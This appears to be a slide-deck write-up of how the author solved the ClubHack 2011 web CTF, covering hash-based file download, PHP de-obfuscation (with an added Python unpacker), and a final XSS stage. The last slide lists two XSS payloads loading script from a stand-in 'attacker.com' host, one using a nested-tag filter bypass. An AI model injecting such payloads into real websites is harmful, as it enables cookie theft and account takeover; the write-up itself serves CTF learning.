How I won ClubHack 2011 CTF

   AMol NAik
   http://amolnaik4.blogspot.com
Agenda
   Introduction to CTF
   ClubHack 2011 preCON CTF
   Tools
   Execution Stages
   Thanks/Questions
Introduction to CTF
   CTF stands for Capture the Flag

   Types:
       Pre-conference
       Educational
       Web based
       Exploitation
       Web + Exploitation
       Teams / Individuals
       Offensive / Defensive
ClubHack 2011 preCON CTF
   Free conference entry

   Qualified to play Treasure Hunt @ClubHack
       Physical CTF


   Web Based
Tools
   Mozilla Firefox
       Add-on: Tamper Data


   Web Server with PHP

   Brain
   Time
   Patience
   ……..
   ……..
Execution
   Register for the event
   Access CTF site
   Gather Information & Analyze
   Look for hidden treasures
   Get the Flag and Submit
Stage - 1
   Information Gathering
       Download.html
           Can be used to download files from the server
           Two params: filename & some HASH
           How important is the hash in the file download?
           What type of hash is it?
           How to generate it?


       UserLogin.html
           Auth Bypass
           Guessable Logins
           What else???
Stage - 1
   Analysis
       Download.html
           Need hash to download file
           Hash is SHA1
           How to generate it?


       UserLogin.html
           No SQLi
           No Auth Bypass
           No Guessable Login
           Brute Force ???
Stage - 2
   Deep Inspection
       Found 'execute.php' in the source of download.html
       Looks like a command utility
       OS commanding???

   Analysis
       No OS command execution
       "Wonly one command"
       Commands which take 'file' as a parameter???

   Single Command
       sha1sum
Stage - 3
   Something to work on
       Hash generation – execute.php
       File Download – download.php
       Login – UserLogin.php

   Try to download files
       Download.php
       Execute.php
       UserLogin.php

   Analysis
       Only 'UserLogin.php' could be downloaded
Stage - 4
   Obfuscated PHP Code
       UserLogin.php is obfuscated
       "Free Online PHP Obfuscator v1.2: http://www.fopo.com.ar"
       No online de-obfuscation tool available
           I was not able to find one


   Analysis
       Go Manual Mode !!
       Create scripts
Stage - 5
   De-Obfuscation
       Replace eval() with echo()
       base64_decode()
       Decode $variable names
       Replace $variables
       ROT13 -> base64_decode() -> gzinflate()
       Just echo
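The de-obfuscation chain on this slide, as an added example that is not the author's scripts: a small static unpacker in Python that peels eval() layers of base64_decode / str_rot13 / gzinflate without ever running the PHP, so an analyst can read the hidden source safely. The obfuscated input is a constructed sample in the same shape, not the CTF's UserLogin.php; the variable names and the login logic inside it are made up.

```python
import base64
import codecs
import re
import zlib

# Python equivalents of the PHP decoding functions found in each layer.
# PHP's gzinflate() is raw DEFLATE with no zlib header, hence wbits=-15.
DECODERS = {
    "base64_decode": base64.b64decode,
    "str_rot13": lambda b: codecs.encode(b.decode("latin-1"), "rot_13").encode("latin-1"),
    "gzinflate": lambda b: zlib.decompress(b, -15),
}

# $name = "literal";  (the carrier variable of a layer, when one is used)
ASSIGN_RE = re.compile(r"\$(\w+)\s*=\s*([\"'])(.*?)\2\s*;", re.S)
FUNC_RE = re.compile(r"\s*(\w+)\s*\(")
ARG_RE = re.compile(r"\s*(?:\$(\w+)|\"([^\"]*)\"|'([^']*)')")


def peel_layer(src: str):
    """Return the PHP source hidden inside the first eval() of src, or None.

    Handles eval(f1(f2(...(literal-or-$var)...))) where every f is a known
    decoder. Nothing is executed: the decoders run in Python on bytes only.
    """
    m = re.search(r"\beval\s*\(", src)
    if m is None:
        return None
    pos = m.end()
    funcs = []
    while True:
        f = FUNC_RE.match(src, pos)
        if f is None:
            break
        funcs.append(f.group(1))
        pos = f.end()
    a = ARG_RE.match(src, pos)
    if a is None:
        raise ValueError("unsupported eval() argument at offset %d" % pos)
    if a.group(1):
        # Argument is a variable: resolve it from a plain string assignment.
        assigns = {name: value for name, _, value in ASSIGN_RE.findall(src)}
        if a.group(1) not in assigns:
            raise ValueError("cannot resolve $" + a.group(1))
        data = assigns[a.group(1)].encode("latin-1")
    else:
        literal = a.group(2) if a.group(2) is not None else a.group(3)
        data = literal.encode("latin-1")
    # The innermost call is applied first, so walk the chain backwards.
    for name in reversed(funcs):
        if name not in DECODERS:
            raise ValueError("unknown decoder " + name)
        data = DECODERS[name](data)
    return data.decode("latin-1")


def unpack(src: str, max_layers: int = 16):
    """Peel eval() layers until plain PHP remains; returns every layer seen."""
    layers = [src]
    while len(layers) <= max_layers:
        inner = peel_layer(layers[-1])
        if inner is None:
            return layers
        layers.append(inner)
    raise ValueError("more than %d nested layers" % max_layers)


def build_sample():
    """Construct a two-layer sample shaped like the slides' description.

    This is a made-up file for the demo, not the CTF's UserLogin.php.
    """
    secret = (
        "<?php\n"
        "$hash = trim(file_get_contents('myhashesarenothere.txt'));\n"
        "if (sha1($_POST['password']) === $hash) { header('Location: Final.php'); }\n"
        "?>"
    )
    # Inner layer: gzdeflate -> base64_encode -> str_rot13 (raw DEFLATE, like PHP).
    comp = zlib.compressobj(9, zlib.DEFLATED, -15)
    raw = comp.compress(secret.encode("latin-1")) + comp.flush()
    blob = codecs.encode(base64.b64encode(raw).decode("ascii"), "rot_13")
    inner = '$d = "%s";\neval(gzinflate(base64_decode(str_rot13($d))));' % blob
    # Outer layer: the whole inner layer base64-encoded and fed straight to eval().
    outer = (
        "<?php\n/* constructed sample in the style of a FOPO-obfuscated file */\n"
        'eval(base64_decode("%s"));\n?>'
        % base64.b64encode(inner.encode("latin-1")).decode("ascii")
    )
    return outer, secret


if __name__ == "__main__":
    obfuscated, expected = build_sample()
    for depth, layer in enumerate(unpack(obfuscated)):
        print("--- layer %d ---\n%s\n" % (depth, layer))
```

Unlike the eval-to-echo trick, this never hands the decoded text to a PHP interpreter, so a layer that hides a web shell or a destructive payload cannot fire while you are reading it.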
Stage - 5
   Analysis
       Credentials -> 'myhashesarenothere.txt'
       Successful Login -> Final.php

   Next
       Access 'myhashesarenothere.txt'
       Log in via UserLogin.php
Stage – 6: Final
   Information Gathering
       POST form
       Looks like mail client
       Hard-coded email addresses & Subject
       Message is the only available space for User Input


   Analysis
       Tamper 'TO' email address & 'Subject'
       Test 'Message' for SQLi, Code Injection, ...
       What else???
Stage – 6: Final
   Damn... It's a ROCK!!!!
   No server-side bug
       Code Injection
       SQLi
   Only XSS
   No <script> & <img>
   Maybe flag.txt
   Maybe messages.txt || mail.txt || sec*.txt
   ?????
   ?????
Stage – 6: Final
   A Ray of Hope
       Tweet from @ClubHack



   Only “XSS”
       Never seen XSS in CTF
       What to exploit?
       Myself??
       Event Handlers
       document.cookie
       Did they mean “Some Cookie” ?
Final
   After 2 days
       Got Flag & Submit link
       Free entry to ClubHack -> Secured!!


   Payloads Used:
       <ScRiPt src="http://attacker.com/evil.js"></script>
           me
       <scr<script>ipt src="http://attacker.com/evil.js"></script>
           Vishal Oza
Thanks/Questions
   webDEViL
       CTF Creation and Access for “Live Demo”
   ClubHack
       Organizing CTF challenge
       For Gifts !!!




   http://twitter.com/amolnaik4
